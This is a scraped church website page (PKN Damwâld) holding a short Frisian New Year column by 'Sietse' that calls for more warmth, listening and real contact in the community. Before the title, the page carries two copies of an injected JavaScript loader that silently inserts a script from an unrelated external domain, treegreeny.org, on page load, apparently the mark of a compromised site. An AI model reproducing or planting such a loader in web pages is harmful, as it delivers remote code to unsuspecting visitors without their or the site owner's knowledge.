;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); In nij begjin mei….. - PKN Damwâld

In nij begjin mei…..

Gepubliceerd op: vrijdag 7 januari 2022

 

 

 

 

 

 

 

wat mear Wij……….en wat minder Ik

wat mear waarmte yn ús mienskip…en wat minder saaklikens,

wat mear  ”echte” kontakten……en wat minder “mail”-kontakten,

wat mear lústerjen…..en wat minder ‘wij witte it wol’,

wat mear tiid foar elkoar….en wat minder yn jo eigen “bubbel”,

wat mear respekt foar de âlderen….en wat minder leeftiids-diskriminatie,

wat mear; elk syn eigen plakje gunne….. en wat minder ‘sa dogge we it no’,

wat mear gast-frijens en wat minder “protokol”,

wat mear ”freegje” oan de minsken…..en wat minder…my yngong fan…,

brûk de minsken as in kaai yn’t slot, dan komt der beweging en nij libben yn ús mienskip!

In nij begjin yn in nij jier mei nije kânsen…….!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns